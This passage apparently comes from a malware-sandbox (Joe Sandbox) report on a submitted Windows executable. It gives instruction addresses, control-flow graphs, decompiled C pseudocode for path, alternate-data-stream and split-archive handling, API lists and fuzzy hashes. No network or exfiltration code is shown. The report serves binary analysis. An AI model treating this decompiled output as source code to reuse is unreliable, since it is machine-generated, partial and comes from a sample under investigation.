                                                                                                                            0x0040a74b
                                                                                                                            0x0040a74d
                                                                                                                            0x0040a768
                                                                                                                            0x0040a777
                                                                                                                            0x00000000
                                                                                                                            0x0040a779
                                                                                                                            0x0040a77f
                                                                                                                            0x0040a782
                                                                                                                            0x0040a786
                                                                                                                            0x0040a78b
                                                                                                                            0x0040a795
                                                                                                                            0x0040a7f0
                                                                                                                            0x0040a7f5
                                                                                                                            0x0040a7f8
                                                                                                                            0x0040a7fd
                                                                                                                            0x0040a800
                                                                                                                            0x0040a805
                                                                                                                            0x0040a805
                                                                                                                            0x0040a808
                                                                                                                            0x0040a80b
                                                                                                                            0x0040a80f
                                                                                                                            0x0040a811
                                                                                                                            0x0040a816
                                                                                                                            0x0040a816
                                                                                                                            0x0040a819
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a795
                                                                                                                            0x0040a74f
                                                                                                                            0x0040a755
                                                                                                                            0x0040a766
                                                                                                                            0x0040a797
                                                                                                                            0x0040a79a
                                                                                                                            0x0040a79e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a766
                                                                                                                            0x0040a74d
                                                                                                                            0x00000000
                                                                                                                            0x0040a7a4
                                                                                                                            0x0040a7a4
                                                                                                                            0x0040a7a7
                                                                                                                            0x0040a7ac
                                                                                                                            0x00000000
                                                                                                                            0x0040a6ca
                                                                                                                            0x0040a6c4
                                                                                                                            0x0040a69b
                                                                                                                            0x0040a679
                                                                                                                            0x0040a647
                                                                                                                            0x0040a841
                                                                                                                            0x0040a847
                                                                                                                            0x0040a84f

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 0040A544
                                                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,?,?), ref: 0040A5F5
                                                                                                                              • Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
                                                                                                                              • Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD
                                                                                                                              • Part of subcall function 0040A2C8: __EH_prolog.LIBCMT ref: 0040A2CD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$ErrorExceptionLastThrowmalloc
                                                                                                                            • String ID: .001$.exe$Split
                                                                                                                            • API String ID: 1950902910-1819480430
                                                                                                                            • Opcode ID: a476c4b01f0dbe546e0013fe73ee2c3a245c48275de61eff46b60db14b225942
                                                                                                                            • Instruction ID: fbde023dd8d3616a20bf780c395040672d5308453d4d409ddda090532e3e46f0
                                                                                                                            • Opcode Fuzzy Hash: a476c4b01f0dbe546e0013fe73ee2c3a245c48275de61eff46b60db14b225942
                                                                                                                            • Instruction Fuzzy Hash: 21A18030A003099FCB14EFA5C585AAEBBB4BF04318F14846EE856BB2D1CB39DE55CB55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404DAF Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 295COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 544 404daf-404dcf call 418d80 call 405780 549 404f83-404f99 call 405719 544->549 550 404dd5-404ddb 544->550 555 404f9b-404f9d 549->555 556 404f9e-404fab call 4055de 549->556 550->549 552 404de1-404e01 call 4036b0 * 2 550->552 562 404e03-404e09 552->562 563 404e0e-404e14 552->563 555->556 564 405000-405007 556->564 565 404fad-404fb3 556->565 562->563 566 404e16-404e29 call 4032ce 563->566 567 404e2b-404e33 call 4039d8 563->567 568 405013-40501a 564->568 569 405009-40500d 564->569 565->564 570 404fb5-404fc1 call 404da0 565->570 566->567 579 404e38-404e45 call 4056f0 566->579 567->579 573 40504c-405053 call 405693 568->573 574 40501c-405026 call 404da0 568->574 569->568 572 4050f1-4050f6 call 404b47 569->572 570->572 586 404fc7-404fca 570->586 585 4050fb 572->585 573->572 588 405059-405064 573->588 574->572 589 40502c-40502f 574->589 595 404e47-404e4a 579->595 596 404e7d-404e87 call 404daf 579->596 591 4050fd-405100 call 404b27 585->591 586->572 592 404fd0-404fed call 404d7d call 40376e 586->592 588->572 593 40506a-405071 call 405596 588->593 589->572 594 405035-40504a call 404d7d 589->594 604 405105 591->604 618 404ff9-404ffb 592->618 621 404fef-404ff4 592->621 593->572 615 405073-4050a6 call 4036b0 call 401ef8 * 2 call 404b47 593->615 594->618 602 404e58-404e70 call 404d7d 595->602 603 404e4c-404e4f 595->603 616 404f71-404f82 call 403204 * 2 596->616 617 404e8d 596->617 619 404e72-404e7b call 4037d2 602->619 620 404e8f-404eb5 call 403740 call 40368d 602->620 603->596 609 404e51-404e56 603->609 610 405107-405115 604->610 609->596 609->602 647 4050a8-4050be wcscmp 615->647 648 4050cb-4050d8 call 404da0 615->648 616->549 617->620 618->591 619->620 636 404eba-404ed0 call 404d3d 620->636 621->618 642 404ed2-404ed6 636->642 643 404f06-404f08 636->643 644 404ed8-404ee5 call 403210 642->644 645 404efe-404f00 SetLastError 642->645 646 404f40-404f6c call 403204 * 2 call 404b27 call 403204 * 2 643->646 658 404ee7-404efc call 403204 call 40368d 644->658 659 404f0a-404f10 644->659 645->643 646->604 652 4050c0-4050c5 647->652 653 4050c7 647->653 661 405118-405122 call 404d7d 648->661 662 4050da-4050dd 648->662 657 405136-40514e call 40376e call 403204 call 404b27 652->657 653->648 657->610 658->636 670 404f12-404f17 659->670 671 404f23-404f3e call 40399c 659->671 679 405124-405127 661->679 680 405129 661->680 667 4050e4-4050f0 call 403204 662->667 668 4050df-4050e2 662->668 667->572 668->661 668->667 670->671 677 404f19-404f1f 670->677 671->646 677->671 686 405130-405133 679->686 680->686 686->657
                                                                                                                            C-Code - Quality: 95%
                                                                                                                            			E00404DAF(intOrPtr* __ecx, void* __eflags) {
				signed int _t129;
				signed int _t130;
				intOrPtr _t131;
				signed int _t132;
				char _t133;
				char _t135;
				signed int _t140;
				signed char _t141;
				signed int _t148;
				intOrPtr _t155;
				intOrPtr _t156;
				void* _t162;
				intOrPtr _t163;
				signed int _t164;
				signed int _t182;
				signed int _t192;
				char _t194;
				signed char _t196;
				void* _t197;
				signed char _t198;
				signed char _t199;
				intOrPtr* _t204;
				void* _t215;
				signed int _t241;
				intOrPtr* _t253;
				short _t255;
				intOrPtr* _t257;
				intOrPtr* _t259;
				void* _t260;

				E00418D80(E0041998C, _t260);
				_t253 =  *((intOrPtr*)(_t260 + 8));
				_t257 = __ecx;
				_t192 = E00405780(_t253, __eflags);
				if(_t192 < 0 ||  *((short*)(_t253 + 2 + _t192 * 2)) == 0) {
					L28:
					 *(_t260 - 0x10) =  *(_t260 - 0x10) | 0xffffffff;
					 *(_t260 - 4) = 5;
					_t129 = E00405719(_t253);
					__eflags = _t129;
					if(_t129 != 0) {
						_push(4);
						_pop(0);
					}
					 *((intOrPtr*)(_t260 + 8)) = _t253;
					_t130 = E004055DE(_t253);
					__eflags = _t130;
					if(_t130 == 0) {
						L37:
						_t131 =  *_t253;
						__eflags = _t131 - 0x5c;
						if(_t131 == 0x5c) {
							L39:
							__eflags =  *((short*)(_t253 + 2));
							_t204 = _t253;
							if( *((short*)(_t253 + 2)) != 0) {
								_t132 = E00405693(_t204);
								__eflags = _t132;
								if(__eflags <= 0) {
									goto L54;
								}
								__eflags =  *((short*)(_t253 + _t132 * 2));
								_t208 = _t253 + _t132 * 2;
								 *((intOrPtr*)(_t260 - 0x14)) = _t253 + _t132 * 2;
								if(__eflags == 0) {
									goto L54;
								}
								__eflags = E00405596(_t208);
								if(__eflags >= 0) {
									goto L54;
								}
								E004036B0(_t260 - 0x38, _t253);
								 *(_t260 - 4) = 6;
								E00401EF8(_t260 - 0x38, 0x5c);
								E00401EF8(_t260 - 0x38, 0x2a);
								 *(_t260 + 0xb) =  *(_t260 + 0xb) & 0x00000000;
								_t140 = E00404B47(_t260 - 0x10, __eflags,  *((intOrPtr*)(_t260 - 0x38)), _t257);
								__eflags = _t140;
								if(_t140 == 0) {
									L50:
									_t141 = E00404DA0(_t253);
									__eflags =  *(_t260 + 0xb);
									_t196 = _t141;
									if( *(_t260 + 0xb) != 0) {
										L58:
										E00404D7D(_t257);
										__eflags = _t196 - 0xffffffff;
										if(_t196 == 0xffffffff) {
											 *(_t257 + 0x20) = 0x10;
										} else {
											 *(_t257 + 0x20) = _t196;
										}
										_push( *((intOrPtr*)(_t260 - 0x14)));
										_t215 = _t257 + 0x28;
										L62:
										E00403204(E0040376E(_t215),  *((intOrPtr*)(_t260 - 0x38)));
										E00404B27(_t260 - 0x10);
										_t135 = 1;
										goto L57;
									}
									__eflags = _t196 - 0xffffffff;
									if(__eflags == 0) {
										L53:
										 *(_t260 - 4) = 5;
										E00403204(_t141,  *((intOrPtr*)(_t260 - 0x38)));
										goto L54;
									}
									__eflags = _t196 & 0x00000010;
									if(__eflags != 0) {
										goto L58;
									}
									goto L53;
								}
								_t197 = _t257 + 0x28;
								_t148 = wcscmp( *(_t257 + 0x28), 0x41b778);
								__eflags = _t148;
								if(_t148 != 0) {
									 *(_t260 + 0xb) = 1;
									goto L50;
								}
								_push( *((intOrPtr*)(_t260 - 0x14)));
								_t215 = _t197;
								goto L62;
							}
							_t198 = E00404DA0(_t204);
							__eflags = _t198 - 0xffffffff;
							if(__eflags == 0) {
								goto L54;
							}
							__eflags = _t198 & 0x00000010;
							if(__eflags == 0) {
								goto L54;
							}
							E00404D7D(_t257);
							 *(_t257 + 0x2c) =  *(_t257 + 0x2c) & 0x00000000;
							 *( *(_t257 + 0x28)) =  *( *(_t257 + 0x28)) & 0x00000000;
							 *(_t257 + 0x20) = _t198;
							goto L36;
						}
						__eflags = _t131 - 0x2f;
						if(__eflags != 0) {
							goto L54;
						}
						goto L39;
					} else {
						__eflags =  *((short*)(_t253 + 6));
						if( *((short*)(_t253 + 6)) != 0) {
							goto L37;
						}
						_t199 = E00404DA0(_t253);
						__eflags = _t199 - 0xffffffff;
						if(__eflags == 0) {
							L54:
							_t133 = E00404B47(_t260 - 0x10, __eflags, _t253, _t257); // executed
							_t194 = _t133;
							L55:
							E00404B27(_t260 - 0x10);
							goto L56;
						}
						__eflags = _t199 & 0x00000010;
						if(__eflags == 0) {
							goto L54;
						}
						E00404D7D(_t257);
						 *(_t257 + 0x20) = _t199;
						_t259 = _t257 + 0x28;
						E0040376E(_t259,  *((intOrPtr*)(_t260 + 8)));
						_t155 = 2;
						__eflags =  *((intOrPtr*)(_t259 + 4)) - _t155;
						if( *((intOrPtr*)(_t259 + 4)) > _t155) {
							 *((intOrPtr*)(_t259 + 4)) = _t155;
							_t156 =  *_t259;
							_t86 = _t156 + 4;
							 *_t86 =  *(_t156 + 4) & 0x00000000;
							__eflags =  *_t86;
						}
						L36:
						_t194 = 1;
						goto L55;
					}
				} else {
					E004036B0(_t260 - 0x2c, _t253 + _t192 * 2);
					 *(_t260 - 4) =  *(_t260 - 4) & 0x00000000;
					E004036B0(_t260 - 0x20, _t253);
					 *(_t260 - 4) = 1;
					if(_t192 <  *(_t260 - 0x1c)) {
						 *(_t260 - 0x1c) = _t192;
						 *( *((intOrPtr*)(_t260 - 0x20)) + _t192 * 2) =  *( *((intOrPtr*)(_t260 - 0x20)) + _t192 * 2) & 0x00000000;
					}
					_t160 =  *(_t260 - 0x28);
					if( *(_t260 - 0x28) <= 6 || E004032CE( *((intOrPtr*)(_t260 - 0x2c)) + _t160 * 2 - 0xc, ":$DATA") == 0) {
						E004039D8(_t260 - 0x2c, ":$DATA");
					}
					_t162 = E004056F0( *((intOrPtr*)(_t260 - 0x20)));
					_t163 =  *((intOrPtr*)(_t260 - 0x20));
					if(_t162 == 0 || _t192 != 2 && (_t192 != 3 ||  *((short*)(_t163 + 4)) != 0x5c)) {
						_t164 = E00404DAF(_t257, __eflags, _t163);
						__eflags = _t164;
						if(_t164 == 0) {
							E00403204(E00403204(_t164,  *((intOrPtr*)(_t260 - 0x20))),  *((intOrPtr*)(_t260 - 0x2c)));
							goto L28;
						}
						_t255 = 0;
						__eflags = 0;
						goto L15;
					} else {
						E00404D7D(_t257);
						_t247 = _t257 + 0x28;
						_t255 = 0;
						 *((intOrPtr*)(_t257 + 0x2c)) = 0;
						 *( *(_t257 + 0x28)) = 0;
						if(_t192 == 2) {
							E004037D2(_t247, _t260 - 0x20);
						}
						L15:
						 *(_t257 + 0x20) =  *(_t257 + 0x20) & 0x0000fbef;
						 *(_t260 - 0x3c) =  *(_t260 - 0x3c) | 0xffffffff;
						 *_t257 = _t255;
						 *((intOrPtr*)(_t257 + 4)) = _t255;
						 *(_t260 - 4) = 2;
						E00403740(_t260 - 0x38,  *(_t260 - 0x3c), _t260 - 0x20);
						 *(_t260 - 4) = 3;
						E0040368D(_t260 - 0x54);
						while(1) {
							 *(_t260 - 4) = 4;
							if(E00404D3D(_t260 - 0x3c, _t260 - 0x54, _t260 + 0xb) == 0) {
								break;
							}
							if( *(_t260 + 0xb) == 0) {
								SetLastError(2);
								break;
							}
							if(E00403210( *((intOrPtr*)(_t260 - 0x54)),  *((intOrPtr*)(_t260 - 0x2c))) != 0) {
								_t241 =  *(_t260 - 0x50);
								__eflags = _t241 - 7;
								if(__eflags > 0) {
									_t182 = _t241 - 6;
									__eflags = _t182 - _t241;
									if(__eflags < 0) {
										 *(_t260 - 0x50) = _t182;
										 *((short*)( *((intOrPtr*)(_t260 - 0x54)) + _t182 * 2)) = _t255;
									}
								}
								E0040399C(_t257 + 0x28, __eflags, _t260 - 0x54);
								 *((char*)(_t257 + 0x24)) = 1;
								 *_t257 =  *((intOrPtr*)(_t260 - 0x44));
								_t172 =  *((intOrPtr*)(_t260 - 0x40));
								 *((intOrPtr*)(_t257 + 4)) =  *((intOrPtr*)(_t260 - 0x40));
								_t194 = 1;
								L26:
								E00403204(E00403204(_t172,  *((intOrPtr*)(_t260 - 0x54))),  *((intOrPtr*)(_t260 - 0x38)));
								E00403204(E00403204(E00404B27(_t260 - 0x3c),  *((intOrPtr*)(_t260 - 0x20))),  *((intOrPtr*)(_t260 - 0x2c)));
								L56:
								_t135 = _t194;
								L57:
								 *[fs:0x0] =  *((intOrPtr*)(_t260 - 0xc));
								return _t135;
							}
							 *(_t260 - 4) = 3;
							E00403204(_t178,  *((intOrPtr*)(_t260 - 0x54)));
							E0040368D(_t260 - 0x54);
						}
						_t194 = 0;
						goto L26;
					}
				}
			}
































                                                                                                                            0x00404db4
                                                                                                                            0x00404dbf
                                                                                                                            0x00404dc2
                                                                                                                            0x00404dcb
                                                                                                                            0x00404dcf
                                                                                                                            0x00404f83
                                                                                                                            0x00404f83
                                                                                                                            0x00404f89
                                                                                                                            0x00404f92
                                                                                                                            0x00404f97
                                                                                                                            0x00404f99
                                                                                                                            0x00404f9b
                                                                                                                            0x00404f9d
                                                                                                                            0x00404f9d
                                                                                                                            0x00404fa1
                                                                                                                            0x00404fa4
                                                                                                                            0x00404fa9
                                                                                                                            0x00404fab
                                                                                                                            0x00405000
                                                                                                                            0x00405000
                                                                                                                            0x00405003
                                                                                                                            0x00405007
                                                                                                                            0x00405013
                                                                                                                            0x00405013
                                                                                                                            0x00405018
                                                                                                                            0x0040501a
                                                                                                                            0x0040504c
                                                                                                                            0x00405051
                                                                                                                            0x00405053
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405059
                                                                                                                            0x0040505e
                                                                                                                            0x00405061
                                                                                                                            0x00405064
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040506f
                                                                                                                            0x00405071
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405077
                                                                                                                            0x00405081
                                                                                                                            0x00405085
                                                                                                                            0x0040508f
                                                                                                                            0x00405094
                                                                                                                            0x0040509f
                                                                                                                            0x004050a4
                                                                                                                            0x004050a6
                                                                                                                            0x004050cb
                                                                                                                            0x004050cd
                                                                                                                            0x004050d2
                                                                                                                            0x004050d6
                                                                                                                            0x004050d8
                                                                                                                            0x00405118
                                                                                                                            0x0040511a
                                                                                                                            0x0040511f
                                                                                                                            0x00405122
                                                                                                                            0x00405129
                                                                                                                            0x00405124
                                                                                                                            0x00405124
                                                                                                                            0x00405124
                                                                                                                            0x00405130
                                                                                                                            0x00405133
                                                                                                                            0x00405136
                                                                                                                            0x0040513e
                                                                                                                            0x00405147
                                                                                                                            0x0040514c
                                                                                                                            0x00000000
                                                                                                                            0x0040514c
                                                                                                                            0x004050da
                                                                                                                            0x004050dd
                                                                                                                            0x004050e4
                                                                                                                            0x004050e7
                                                                                                                            0x004050eb
                                                                                                                            0x00000000
                                                                                                                            0x004050f0
                                                                                                                            0x004050df
                                                                                                                            0x004050e2
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004050e2
                                                                                                                            0x004050ab
                                                                                                                            0x004050b4
                                                                                                                            0x004050bb
                                                                                                                            0x004050be
                                                                                                                            0x004050c7
                                                                                                                            0x00000000
                                                                                                                            0x004050c7
                                                                                                                            0x004050c0
                                                                                                                            0x004050c3
                                                                                                                            0x00000000
                                                                                                                            0x004050c3
                                                                                                                            0x00405021
                                                                                                                            0x00405023
                                                                                                                            0x00405026
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040502c
                                                                                                                            0x0040502f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405037
                                                                                                                            0x0040503f
                                                                                                                            0x00405043
                                                                                                                            0x00405047
                                                                                                                            0x00000000
                                                                                                                            0x00405047
                                                                                                                            0x00405009
                                                                                                                            0x0040500d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404fad
                                                                                                                            0x00404fad
                                                                                                                            0x00404fb3
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404fbc
                                                                                                                            0x00404fbe
                                                                                                                            0x00404fc1
                                                                                                                            0x004050f1
                                                                                                                            0x004050f6
                                                                                                                            0x004050fb
                                                                                                                            0x004050fd
                                                                                                                            0x00405100
                                                                                                                            0x00000000
                                                                                                                            0x00405100
                                                                                                                            0x00404fc7
                                                                                                                            0x00404fca
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404fd2
                                                                                                                            0x00404fda
                                                                                                                            0x00404fdd
                                                                                                                            0x00404fe2
                                                                                                                            0x00404fe9
                                                                                                                            0x00404fea
                                                                                                                            0x00404fed
                                                                                                                            0x00404fef
                                                                                                                            0x00404ff2
                                                                                                                            0x00404ff4
                                                                                                                            0x00404ff4
                                                                                                                            0x00404ff4
                                                                                                                            0x00404ff4
                                                                                                                            0x00404ff9
                                                                                                                            0x00404ff9
                                                                                                                            0x00000000
                                                                                                                            0x00404ff9
                                                                                                                            0x00404de1
                                                                                                                            0x00404de8
                                                                                                                            0x00404ded
                                                                                                                            0x00404df5
                                                                                                                            0x00404dfd
                                                                                                                            0x00404e01
                                                                                                                            0x00404e06
                                                                                                                            0x00404e09
                                                                                                                            0x00404e09
                                                                                                                            0x00404e0e
                                                                                                                            0x00404e14
                                                                                                                            0x00404e33
                                                                                                                            0x00404e33
                                                                                                                            0x00404e3b
                                                                                                                            0x00404e42
                                                                                                                            0x00404e45
                                                                                                                            0x00404e80
                                                                                                                            0x00404e85
                                                                                                                            0x00404e87
                                                                                                                            0x00404f7c
                                                                                                                            0x00000000
                                                                                                                            0x00404f82
                                                                                                                            0x00404e8d
                                                                                                                            0x00404e8d
                                                                                                                            0x00000000
                                                                                                                            0x00404e58
                                                                                                                            0x00404e5a
                                                                                                                            0x00404e62
                                                                                                                            0x00404e65
                                                                                                                            0x00404e6a
                                                                                                                            0x00404e6d
                                                                                                                            0x00404e70
                                                                                                                            0x00404e76
                                                                                                                            0x00404e76
                                                                                                                            0x00404e8f
                                                                                                                            0x00404e8f
                                                                                                                            0x00404e95
                                                                                                                            0x00404e99
                                                                                                                            0x00404e9b
                                                                                                                            0x00404ea5
                                                                                                                            0x00404ea9
                                                                                                                            0x00404eb1
                                                                                                                            0x00404eb5
                                                                                                                            0x00404eba
                                                                                                                            0x00404ec5
                                                                                                                            0x00404ed0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404ed6
                                                                                                                            0x00404f00
                                                                                                                            0x00000000
                                                                                                                            0x00404f00
                                                                                                                            0x00404ee5
                                                                                                                            0x00404f0a
                                                                                                                            0x00404f0d
                                                                                                                            0x00404f10
                                                                                                                            0x00404f12
                                                                                                                            0x00404f15
                                                                                                                            0x00404f17
                                                                                                                            0x00404f1c
                                                                                                                            0x00404f1f
                                                                                                                            0x00404f1f
                                                                                                                            0x00404f17
                                                                                                                            0x00404f2a
                                                                                                                            0x00404f32
                                                                                                                            0x00404f36
                                                                                                                            0x00404f38
                                                                                                                            0x00404f3b
                                                                                                                            0x00404f3e
                                                                                                                            0x00404f40
                                                                                                                            0x00404f4b
                                                                                                                            0x00404f65
                                                                                                                            0x00405105
                                                                                                                            0x00405105
                                                                                                                            0x00405107
                                                                                                                            0x0040510d
                                                                                                                            0x00405115
                                                                                                                            0x00405115
                                                                                                                            0x00404eea
                                                                                                                            0x00404eee
                                                                                                                            0x00404ef7
                                                                                                                            0x00404ef7
                                                                                                                            0x00404f06
                                                                                                                            0x00000000
                                                                                                                            0x00404f06
                                                                                                                            0x00404e45

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 00404DB4
                                                                                                                            • SetLastError.KERNEL32(00000002,?,?,?,:$DATA,?,00000000,?,?,00000001), ref: 00404F00
                                                                                                                            • wcscmp.MSVCRT ref: 004050B4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorH_prologLastwcscmp
                                                                                                                            • String ID: :$DATA
                                                                                                                            • API String ID: 161073058-2587938151
                                                                                                                            • Opcode ID: 5f020bb28cd8117265225efec81bdc0651470f94f3d0112356166a414e1d72bb
                                                                                                                            • Instruction ID: da1b248e0d231fcc0c283d7306f0842e77f2967e3c74f92a20ef298db707ecaa
                                                                                                                            • Opcode Fuzzy Hash: 5f020bb28cd8117265225efec81bdc0651470f94f3d0112356166a414e1d72bb
                                                                                                                            • Instruction Fuzzy Hash: 8EB1D2719006059ACF24EFA5C841AEEBBB4EF54318F10813FE552772E2DB3D5A49CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040EBB1 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 694 40ebb1-40ebd4 call 418d80 call 407b3a 699 40ed32-40ed40 694->699 700 40ebda-40ebe3 call 40ed43 694->700 703 40ebe5-40ebe7 700->703 704 40ebec-40ebf1 700->704 703->699 705 40ec02-40ec26 call 4031dd memcpy 704->705 706 40ebf3-40ebf8 704->706 710 40ec2a-40ec31 705->710 706->705 707 40ebfa-40ebfd 706->707 707->699 711 40ec51-40ec6d call 406749 710->711 712 40ec33-40ec41 710->712 717 40ec73-40ec78 711->717 718 40ed25 711->718 712->711 713 40ec43-40ec45 712->713 713->711 714 40ec47-40ec4b 713->714 714->711 716 40ece9-40ecec 714->716 719 40ed27-40ed30 call 403204 716->719 717->716 720 40ec7a-40ec86 717->720 718->719 719->699 721 40ec88-40ec8b 720->721 722 40eccb-40ece4 memmove 720->722 724 40ecb2-40ecb4 721->724 725 40ec8d-40ec91 721->725 722->710 724->722 729 40ecb6-40ecc4 call 40ed43 724->729 727 40ec93-40ec97 725->727 728 40eca8-40eca9 725->728 730 40ec99-40ec9d 727->730 731 40ecab-40ecad 727->731 728->724 737 40ecc6-40ecc9 729->737 738 40ecee-40ed22 memcpy call 406827 729->738 733 40ecaf 730->733 734 40ec9f-40eca4 730->734 731->724 733->724 734->721 736 40eca6 734->736 736->724 737->720 738->718
                                                                                                                            C-Code - Quality: 80%
                                                                                                                            			E0040EBB1(void* __ecx, void* __eflags) {
				signed int _t46;
				void* _t48;
				intOrPtr* _t50;
				signed int _t51;
				void* _t53;
				signed int _t56;
				intOrPtr* _t60;
				void* _t64;
				void* _t67;
				signed int _t73;
				signed int _t77;
				void* _t83;
				signed int _t88;
				signed int _t89;
				signed int _t93;
				void* _t95;
				signed int _t97;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t104;

				E00418D80(E0041A4C4, _t99);
				_t102 = _t101 - 0x1c;
				_t95 = __ecx;
				_t64 = __ecx + 0x50;
				_t46 = E00407B3A(__eflags, 0x20); // executed
				if(_t46 == 0) {
					if(E0040ED43(_t64) == 0) {
						_t88 =  *(_t99 + 0xc);
						__eflags = _t88;
						if(_t88 == 0) {
							L6:
							_push(0x8000); // executed
							_t48 = E004031DD(); // executed
							 *(_t99 - 0x10) = _t48;
							 *(_t99 - 0x18) = _t48;
							 *(_t99 - 4) =  *(_t99 - 4) & 0x00000000;
							memcpy(_t48, _t64, 0x20);
							 *(_t99 - 0x20) =  *(_t99 - 0x20) & 0x00000000;
							_t104 = _t102 + 0x10;
							_t11 = _t99 - 0x1c;
							 *_t11 =  *(_t99 - 0x1c) & 0x00000000;
							__eflags =  *_t11;
							while(1) {
								__eflags = _t88;
								_t73 = 0x7fe0;
								if(_t88 == 0) {
									goto L11;
								}
								_t51 =  *_t88 -  *(_t99 - 0x20);
								__eflags = _t51;
								asm("sbb edx, [ebp-0x1c]");
								 *(_t99 - 0x24) =  *(_t88 + 4);
								if(_t51 != 0) {
									goto L11;
								} else {
									__eflags = _t51 - 0x7fe0;
									if(_t51 >= 0x7fe0) {
										goto L11;
									} else {
										__eflags = _t51;
										_t73 = _t51;
										if(_t51 == 0) {
											L27:
											_t97 = 1;
										} else {
											goto L11;
										}
									}
								}
								L30:
								E00403204(_t51,  *(_t99 - 0x10));
								_t46 = _t97;
								goto L31;
								L11:
								_t50 =  *((intOrPtr*)(_t99 + 8));
								_t89 = 0;
								 *(_t99 - 0x14) = 0;
								_t51 =  *((intOrPtr*)( *_t50 + 0xc))(_t50,  *(_t99 - 0x10) + 0x20, _t73, _t99 - 0x14);
								__eflags = _t51;
								if(_t51 != 0) {
									L29:
									_t97 = _t51;
								} else {
									_t77 =  *(_t99 - 0x14);
									__eflags = _t77;
									if(_t77 == 0) {
										goto L27;
									} else {
										while(1) {
											_t53 =  *(_t99 - 0x10);
											_t67 = _t53 + _t89 + 1;
											_t83 = _t53 + _t77;
											__eflags = _t67 - _t83;
											if(_t67 > _t83) {
												break;
											} else {
												goto L14;
											}
											while(1) {
												L14:
												__eflags =  *_t67 - 0x37;
												if( *_t67 == 0x37) {
													break;
												}
												__eflags =  *(_t67 + 1) - 0x37;
												if( *(_t67 + 1) == 0x37) {
													_t67 = _t67 + 1;
												} else {
													__eflags =  *((char*)(_t67 + 2)) - 0x37;
													if( *((char*)(_t67 + 2)) == 0x37) {
														_t67 = _t67 + 2;
													} else {
														__eflags =  *(_t67 + 3) - 0x37;
														if( *(_t67 + 3) == 0x37) {
															_t67 = _t67 + 3;
															__eflags = _t67;
														} else {
															_t67 = _t67 + 4;
															__eflags = _t67 - _t83;
															if(_t67 <= _t83) {
																continue;
															} else {
															}
														}
													}
												}
												break;
											}
											__eflags = _t67 - _t83;
											if(_t67 > _t83) {
												break;
											} else {
												_t89 = _t67 -  *(_t99 - 0x10);
												_t56 = E0040ED43(_t67);
												__eflags = _t56;
												if(_t56 != 0) {
													memcpy(_t95 + 0x50, _t67, 0x20);
													asm("adc eax, [ebp-0x1c]");
													 *((intOrPtr*)(_t95 + 0x40)) =  *((intOrPtr*)(_t95 + 0x40)) + _t89 +  *(_t99 - 0x20);
													asm("adc [esi+0x44], eax");
													_t60 =  *((intOrPtr*)(_t99 + 8));
													_t93 =  *((intOrPtr*)(_t95 + 0x40)) + 0x20;
													__eflags = _t93;
													asm("adc esi, ecx");
													_t51 =  *((intOrPtr*)( *_t60 + 0x10))(_t60, _t93,  *((intOrPtr*)(_t95 + 0x44)), 0, 0);
													goto L29;
												} else {
													_t77 =  *(_t99 - 0x14);
													continue;
